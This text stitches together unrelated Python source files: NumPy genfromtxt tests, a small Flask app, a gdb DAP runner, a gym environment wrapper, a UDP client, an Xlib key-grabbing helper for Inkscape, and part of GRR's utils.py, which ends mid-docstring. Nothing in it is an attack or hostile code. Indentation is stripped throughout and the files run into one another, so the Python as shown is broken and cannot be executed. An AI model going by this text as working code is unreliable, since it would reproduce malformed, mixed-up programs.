mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
        test = np.ndfromtxt(TextIO(data), **kwargs)
        assert_equal(test, ctrl)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,3')
dtype = [('a', np.int), ('b', np.float)]
test = np.recfromcsv(data, missing_values='N/A', dtype=dtype)
control = np.array([(0, 1), (2, 3)],
dtype=dtype)
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2, 3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
    # Thanks to another Windows brokenness, we can't use
    # NamedTemporaryFile: a file created from this function cannot be
    # reopened by another open call. So we first build the gzipped string
    # of the test reference array, write it to a securely opened file,
    # which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
app.py
from flask import Flask, render_template, send_from_directory, request, send_file
import os
from threading import Thread
from os import path
from werkzeug.datastructures import MultiDict
from werkzeug.utils import redirect, secure_filename
from Facebook import madangowri
app = Flask(__name__)
file_path_main = path.abspath(__file__)
dir_path_main = path.dirname(file_path_main)
@app.route('/')
def hello():
return 'Home Page'
@app.route("/facebook/permlove")
def dontbecorner():
thread_b = Thread(target=madangowri.Run, args=())
thread_b.start()
return render_template("timepage.html", title="perm Love")
if __name__ == '__main__':
# Bind to PORT if defined, otherwise default to 5000.
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
run.py
import sys
from threading import Thread
from queue import Queue
from gdb_dap.reader import reader_thread
from gdb_dap.writer import writer_thread
from gdb_dap.gdb_dap import json_process
if __name__ == "__main__":
thread = None
reader = None
writer = None
read_from = sys.stdin.buffer
write_to = sys.stdout.buffer
# read_from = open('./cmds.txt', 'rb')
q_read = Queue()
q_write = Queue()
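    # Wiring (see below): reader_thread reads from read_from into q_read,
    # json_process consumes q_read and puts its output onto q_write, and
    # writer_thread drains q_write to write_to.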
reader = Thread(target=reader_thread, args=(read_from, q_read))
writer = Thread(target=writer_thread, args=(write_to, q_write))
thread = Thread(target=json_process, args=(q_read, q_write))
if thread:
thread.start()
writer.start()
reader.start()
if thread:
thread.join()
writer.join()
reader.join()
gym_environment.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from multiprocessing import Process, Pipe
import numpy as np
import cv2
import gym
from environment import environment
from sam.spectral_residual_saliency import SpectralResidualSaliency
COMMAND_RESET = 0
COMMAND_ACTION = 1
COMMAND_TERMINATE = 2
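# Commands sent over the Pipe from GymEnvironment to the worker process:
# RESET replies with a preprocessed state, ACTION replies with
# [state, reward, terminal], and TERMINATE acknowledges and shuts down.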
GlobalImageId = 0
def preprocess_frame(observation):
# observation shape = (210, 160, 3)
observation = observation.astype(np.float32)
resized_observation = cv2.resize(observation, (84, 84))
resized_observation = resized_observation / 255.0
return resized_observation
def mysaliency_on_frame_colormap(saliency, frame):
height, width, _ = frame.shape
saliency_new = np.broadcast_to(np.expand_dims(saliency, 2), (saliency.shape[0],saliency.shape[1],3))
heatmap = cv2.applyColorMap(saliency_new, cv2.COLORMAP_JET)
result = heatmap * 0.4 + frame * 0.5
return result.astype('uint8')
def spectralsaliency(inputimage):
srs = SpectralResidualSaliency(inputimage)
map = srs.get_saliency_map()
return map
def spectralsaliency_for_colormap(inputimage):
srs = SpectralResidualSaliency(inputimage)
map = srs.get_saliency_map()
map = map * 255
return map.astype('uint8')
def preprocess_frame_with_attention(image):
#global GlobalImageId
#GlobalImageId += 1
image_salmap = spectralsaliency_for_colormap(image) #spectral saliency
image_with_attention = mysaliency_on_frame_colormap(image_salmap, image) # heatmap
#outname = 'S' + str(GlobalImageId)
#cv2.imwrite('/home/ml/kkheta2/lab/unrealwithattention/attentionframes/MZuma/' + '%s' % outname + '.png', image_with_attention)
image_with_attention = image_with_attention.astype(np.float32)
image_with_attention = image_with_attention / 255.0
image_with_attention = cv2.resize(image_with_attention, (84, 84)) # reverting back to 84*84 for baseline code
return image_with_attention
def worker(conn, env_name):
env = gym.make(env_name)
env.reset()
conn.send(0)
while True:
command, arg = conn.recv()
if command == COMMAND_RESET:
obs = env.reset()
#state = preprocess_frame(obs)
state = preprocess_frame_with_attention(obs)
conn.send(state)
elif command == COMMAND_ACTION:
reward = 0
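            # Repeat the chosen action for 4 emulator steps (frame skip),
            # accumulating the reward and stopping early on a terminal state.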
for i in range(4):
obs, r, terminal, _ = env.step(arg)
reward += r
if terminal:
break
#state = preprocess_frame(obs)
state = preprocess_frame_with_attention(obs)
conn.send([state, reward, terminal])
elif command == COMMAND_TERMINATE:
break
else:
print("bad command: {}".format(command))
env.close()
conn.send(0)
conn.close()
class GymEnvironment(environment.Environment):
@staticmethod
def get_action_size(env_name):
env = gym.make(env_name)
action_size = env.action_space.n
env.close()
return action_size
def __init__(self, env_name):
environment.Environment.__init__(self)
self.conn, child_conn = Pipe()
self.proc = Process(target=worker, args=(child_conn, env_name))
self.proc.start()
self.conn.recv()
self.reset()
def reset(self):
self.conn.send([COMMAND_RESET, 0])
self.last_state = self.conn.recv()
self.last_action = 0
self.last_reward = 0
def stop(self):
self.conn.send([COMMAND_TERMINATE, 0])
ret = self.conn.recv()
self.conn.close()
self.proc.join()
print("gym environment stopped")
def process(self, action):
self.conn.send([COMMAND_ACTION, action])
state, reward, terminal = self.conn.recv()
pixel_change = self._calc_pixel_change(state, self.last_state)
self.last_state = state
self.last_action = action
self.last_reward = reward
return state, reward, terminal, pixel_change
def process_with_attention(self, action):
self.conn.send([COMMAND_ACTION, action])
state, reward, terminal = self.conn.recv()
pixel_change = self._calc_pixel_change(state, self.last_state)
self.last_state = state
self.last_action = action
self.last_reward = reward
return state, reward, terminal, pixel_change
nets_udp_client.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import time
import threading
from socket import *
class UdpClient(object):
def __init__(self, host='127.0.0.1', port=6001):
self.Host = host
self.Port = port
self.BufSize = 4096
self.Addr = (self.Host, self.Port)
self.Socket = socket(AF_INET, SOCK_DGRAM)
def start(self):
try:
print('Start Udp Client')
            print('(Press Ctrl + Break to abort...)')
t = threading.Thread(target=self.recv)
t.setDaemon(True)
t.start()
while True:
data = input()
if not data:
break
self.Socket.sendto(data.encode('utf-8'), self.Addr)
print('[{}:{}] {}'.format(self.Addr[0], self.Addr[1], time.strftime(
'%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))
print('Local->Remote:{}'.format(data))
except Exception as e:
            print('Error sending message:', e)
finally:
self.Socket.close()
def stop(self):
self.Socket.close()
print('Stop Udp Client')
def recv(self):
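        # Send an initial greeting datagram before blocking on replies
        # (this lets the server learn this client's address).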
self.Socket.sendto('hello'.encode('utf-8'), self.Addr)
while True:
data, addr = self.Socket.recvfrom(self.BufSize)
if not data:
break
print('[{}:{}] {}'.format(addr[0], str(addr[1]), time.strftime(
'%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))
print('Remote->Client:{}'.format(data.decode('utf-8')))
def start_udp_client(host, port):
c = UdpClient(host=host, port=port)
c.start()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
        '-i', '--ip', help='ip address: IPv4 address on which the UDP server listens, such as \'127.0.0.1\'', type=str, default='127.0.0.1')
parser.add_argument(
        '-p', '--port', help='port: port number on which the UDP server listens, such as \'6001\'', type=int, default=6001)
args = parser.parse_args()
start_udp_client(host=args.ip, port=args.port)
main.py
import threading
import Xlib
from Xlib.display import Display
from Xlib import X, XK
from Xlib.protocol import event
from normal import normal_mode
class Manager():
def __init__(self, inkscape_id):
self.id = inkscape_id
self.disp = Display()
self.screen = self.disp.screen()
self.root = self.screen.root
self.inkscape = self.disp.create_resource_object('window', inkscape_id)
self.mode = normal_mode
def event(self, name, detail, state):
return name(
time=X.CurrentTime,
root=self.root,
window=self.inkscape,
same_screen=0, child=Xlib.X.NONE,
root_x=0, root_y=0, event_x=0, event_y=0,
state=state,
detail=detail
)
def string_to_keycode(self, key):
keysym = XK.string_to_keysym(key)
keycode = self.disp.keysym_to_keycode(keysym)
return keycode
def press(self, key, mask=X.NONE):
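        # Synthesize a KeyPress/KeyRelease pair for the given key name and
        # deliver both events directly to the Inkscape window.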
keycode = self.string_to_keycode(key)
self.inkscape.send_event(self.event(event.KeyPress, keycode, mask), propagate=True)
self.inkscape.send_event(self.event(event.KeyRelease, keycode, mask), propagate=True)
self.disp.flush()
self.disp.sync()
def grab(self):
self.inkscape.grab_key(X.AnyKey, X.AnyModifier, True, X.GrabModeAsync, X.GrabModeAsync)
        # Ungrab window manager / application shortcuts (Super, Alt, Shift + ...)
self.inkscape.ungrab_key(self.string_to_keycode('Super_L'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Alt_L'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Alt_R'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Shift_L'), X.AnyModifier, True)
self.inkscape.ungrab_key(self.string_to_keycode('Shift_R'), X.AnyModifier, True)
self.inkscape.change_attributes(event_mask=X.KeyReleaseMask | X.KeyPressMask | X.StructureNotifyMask)
def ungrab(self):
self.inkscape.ungrab_key(X.AnyKey, X.AnyModifier, True)
def listen(self):
self.grab()
while True:
evt = self.disp.next_event()
if evt.type in [X.KeyPress, X.KeyRelease]:
keycode = evt.detail
keysym = self.disp.keycode_to_keysym(keycode, 0)
char = XK.keysym_to_string(keysym)
self.disp.allow_events(X.ReplayKeyboard, X.CurrentTime)
self.mode(self, evt, char)
if evt.type == X.DestroyNotify:
if evt.window.id == self.id:
self.ungrab()
return
def create(inkscape_id):
m = Manager(inkscape_id)
m.listen()
def is_inkscape(window):
return (window.get_wm_class() and 'inkscape' in window.get_wm_class()[0])
def main():
disp = Display()
screen = disp.screen()
root = screen.root
# First listen for existing windows
for window in root.query_tree().children:
if is_inkscape(window):
print('Found existing window')
listen = threading.Thread(target=create, args=[window.id])
listen.start()
# New windows
root.change_attributes(event_mask=X.SubstructureNotifyMask)
while True:
evt = disp.next_event()
if evt.type == X.CreateNotify:
window = evt.window
try:
if is_inkscape(window):
print('New window!')
listen = threading.Thread(target=create, args=[window.id])
listen.start()
except Xlib.error.BadWindow:
pass
if __name__ == '__main__':
main()
utils.py
#!/usr/bin/env python
"""This file contains various utility classes used by GRR."""
import array
import base64
import copy
import cStringIO
import errno
import functools
import getpass
import os
import pipes
import platform
import Queue
import random
import re
import shutil
import socket
import stat
import struct
import tarfile
import tempfile
import threading
import time
import weakref
import zipfile
import zlib
class Error(Exception):
pass
def Proxy(f):
"""A helper to create a proxy method in a class."""
def Wrapped(self, *args):
return getattr(self, f)(*args)
return Wrapped
class TempDirectory(object):
"""A self cleaning temporary directory.
Do not use this function for any client related temporary files! Use
the functionality provided by client_actions/tempfiles.py instead.
"""
def __enter__(self):
self.name = tempfile.mkdtemp()
return self.name
def __exit__(self, exc_type, exc_value, traceback):
shutil.rmtree(self.name, True)
# This is a synchronize decorator.
def Synchronized(f):
"""Synchronization decorator."""
@functools.wraps(f)
def NewFunction(self, *args, **kw):
with self.lock:
return f(self, *args, **kw)
return NewFunction
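# Illustrative use of Synchronized (not part of the original module): the
# decorated class is expected to expose a `self.lock`, e.g.
#
#   class Counter(object):
#     def __init__(self):
#       self.lock = threading.RLock()
#       self.value = 0
#
#     @Synchronized
#     def Increment(self):
#       self.value += 1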
class InterruptableThread(threading.Thread):
"""A class which exits once the main thread exits."""
def __init__(self,
target=None,
args=None,
kwargs=None,
sleep_time=10,
name=None,
**kw):
self.exit = False
self.last_run = 0
self.target = target
self.args = args or ()
self.kwargs = kwargs or {}
self.sleep_time = sleep_time
if name is None:
raise ValueError("Please name your threads.")
super(InterruptableThread, self).__init__(name=name, **kw)
# Do not hold up program exit
self.daemon = True
def Iterate(self):
"""This will be repeatedly called between sleeps."""
def Stop(self):
self.exit = True
def run(self):
    # When the main thread exits, the time module may already have been torn
    # down (set to None), so we take local references to the functions we need.
sleep = time.sleep
now = time.time
while not self.exit:
if self.target:
self.target(*self.args, **self.kwargs)
else:
self.Iterate()
# Implement interruptible sleep here.
self.last_run = now()
# Exit if the main thread disappears.
while (time and not self.exit and
now() < self.last_run + self.sleep_time):
sleep(1)
class Node(object):
"""An entry to a linked list."""
next = None
prev = None
data = None
def __init__(self, key, data):
self.data = data
self.key = key
def __str__(self):
return "Node %s: %s" % (self.key, SmartStr(self.data))
def __repr__(self):
return SmartStr(self)
class LinkedList(object):
"""A simple doubly linked list used for fast caches."""
def __init__(self):
# We are the head node.
self.next = self.prev = self
self.size = 0
def AppendNode(self, node):
self.size += 1
last_node = self.prev
last_node.next = node
node.prev = last_node
node.next = self
self.prev = node
def PopLeft(self):
"""Returns the head node and removes it from the list."""
if self.next is self:
raise IndexError("Pop from empty list.")
first_node = self.next
self.Unlink(first_node)
return first_node
def Pop(self):
"""Returns the tail node and removes it from the list."""
if self.prev is self:
raise IndexError("Pop from empty list.")
last_node = self.prev
self.Unlink(last_node)
return last_node
def Unlink(self, node):
"""Removes a given node from the list."""
self.size -= 1
node.prev.next = node.next
node.next.prev = node.prev
node.next = node.prev = None
def __iter__(self):
p = self.next
while p is not self:
yield p
p = p.next
def __len__(self):
return self.size
def __str__(self):
p = self.next
s = []
while p is not self:
s.append(str(p.data))
p = p.next
return "[" + ", ".join(s) + "]"
def Print(self):
p = self.next
while p is not self:
print "%s: prev %r next %r\n" % (p.data, p.prev, p.next)
p = p.next
class FastStore(object):
"""This is a cache which expires objects in oldest first manner.
This implementation first appeared in PyFlag.
"""
def __init__(self, max_size=10):
"""Constructor.
Args:
max_size: The maximum number of objects held in cache.
"""
    # This class implements an LRU cache which needs fast updates of the LRU
# order for random elements. This is usually implemented by using a
# dict for fast lookups and a linked list for quick deletions / insertions.
self._age = LinkedList()
self._hash = {}
self._limit = max_size
self.lock = threading.RLock()
def KillObject(self, obj):
"""Perform cleanup on objects when they expire.
Should be overridden by classes which need to perform special cleanup.
Args:
obj: The object which was stored in the cache and is now expired.
"""
@Synchronized
def __iter__(self):
return iter([(key, n.data) for key, n in self._hash.iteritems()])
@Synchronized
def Expire(self):
"""Expires old cache entries."""
while len(self._age) > self._limit:
node = self._age.PopLeft()
self._hash.pop(node.key, None)
self.KillObject(node.data)
@Synchronized
def Put(self, key, obj):
"""Add the object to the cache."""
# Remove the old entry if it is there.
node = self._hash.pop(key, None)
if node:
self._age.Unlink(node)
# Make a new node and insert it.
node = Node(key=key, data=obj)
self._hash[key] = node
self._age.AppendNode(node)
self.Expire()
return key
@Synchronized
def ExpireObject(self, key):
"""Expire a specific object from cache."""
node = self._hash.pop(key, None)
if node:
self._age.Unlink(node)
self.KillObject(node.data)
return node.data
@Synchronized
def ExpireRegEx(self, regex):
"""Expire all the objects with the key matching the regex."""
reg = re.compile(regex)
for key in list(self._hash):
if reg.match(key):
self.ExpireObject(key)
@Synchronized
def ExpirePrefix(self, prefix):
"""Expire all the objects with the key having a given prefix."""
for key in list(self._hash):
if key.startswith(prefix):
self.ExpireObject(key)
@Synchronized
def Pop(self, key):
"""Remove the object from the cache completely."""
node = self._hash.get(key)
if node:
del self._hash[key]
self._age.Unlink(node)
return node.data
@Synchronized
def Get(self, key):
"""Fetch the object from cache.
Objects may be flushed from cache at any time. Callers must always
handle the possibility of KeyError raised here.
Args:
key: The key used to access the object.
Returns:
Cached object.
Raises:
KeyError: If the object is not present in the cache.
"""
if key not in self._hash:
raise KeyError(key)
node = self._hash[key]
self._age.Unlink(node)
self._age.AppendNode(node)
return node.data
@Synchronized
def __contains__(self, obj):
return obj in self._hash
@Synchronized
def __getitem__(self, key):
return self.Get(key)
@Synchronized
def Flush(self):
"""Flush all items from cache."""
while self._age:
node = self._age.PopLeft()
self.KillObject(node.data)
self._hash = dict()
def __len__(self):
return len(self._hash)
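# Illustrative use of FastStore (not part of the original module): entries are
# evicted oldest-first once max_size is exceeded, and Get() then raises KeyError.
#
#   cache = FastStore(max_size=2)
#   cache.Put("a", 1)
#   cache.Put("b", 2)
#   cache.Put("c", 3)   # "a" is evicted here
#   cache.Get("b")      # -> 2, and "b" becomes the most recently used entry
#   cache.Get("a")      # raises KeyError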
class TimeBasedCache(FastStore):
"""A Cache which expires based on time."""
active_caches = None
house_keeper_thread = None
def __init__(self, max_size=10, max_age=600):
"""Constructor.
This cache will refresh the age of the cached object as long as they are
accessed within the allowed age. The age refers to the time since it was
last touched.
Args:
max_size: The maximum number of objects held in cache.
max_age: The maximum length of time an object is considered alive.
"""
super(TimeBasedCache, self).__init__(max_size)
self.max_age = max_age
def HouseKeeper():
"""A housekeeper thread which expunges old objects."""
if not time:
# This might happen when the main thread exits, we don't want to raise.
return
now = time.time()
for cache in TimeBasedCache.active_caches:
# Only expunge while holding the lock on the data store.
with cache.lock:
# pylint: disable=protected-access
# We need to take a copy of the value list because we are changing
# this dict during the iteration.
for node in cache._hash.values():
timestamp, obj = node.data
# Expire the object if it is too old.
if timestamp + cache.max_age < now:
cache.KillObject(obj)
cache._age.Unlink(node)
cache._hash.pop(node.key, None)
# pylint: enable=protected-access
if not TimeBasedCache.house_keeper_thread:
TimeBasedCache.active_caches = weakref.WeakSet()
# This thread is designed to never finish.
TimeBasedCache.house_keeper_thread = InterruptableThread(
name="HouseKeeperThread", target=HouseKeeper)
TimeBasedCache.house_keeper_thread.start()
TimeBasedCache.active_caches.add(self)
@Synchronized
def Get(self, key):
now = time.time()
stored = super(TimeBasedCache, self).Get(key)
if stored[0] + self.max_age < now:
raise KeyError("Expired")
# This updates the timestamp in place to keep the object alive
stored[0] = now
return stored[1]
def Put(self, key, obj):
super(TimeBasedCache, self).Put(key, [time.time(), obj])
class Memoize(object):
"""A decorator to produce a memoizing version of a method."""
def __init__(self, deep_copy=False):
"""Constructor.
Args:
deep_copy: Whether to perform a deep copy of the returned object.
Otherwise, a direct reference is returned.
"""
self.deep_copy = deep_copy
def __call__(self, f):
"""Produce a memoizing version of f.
    Requires that all parameters are hashable. Unless deep_copy is set, the
    return value is not copied, so changes to a returned object may be visible
    in future invocations.
Args:
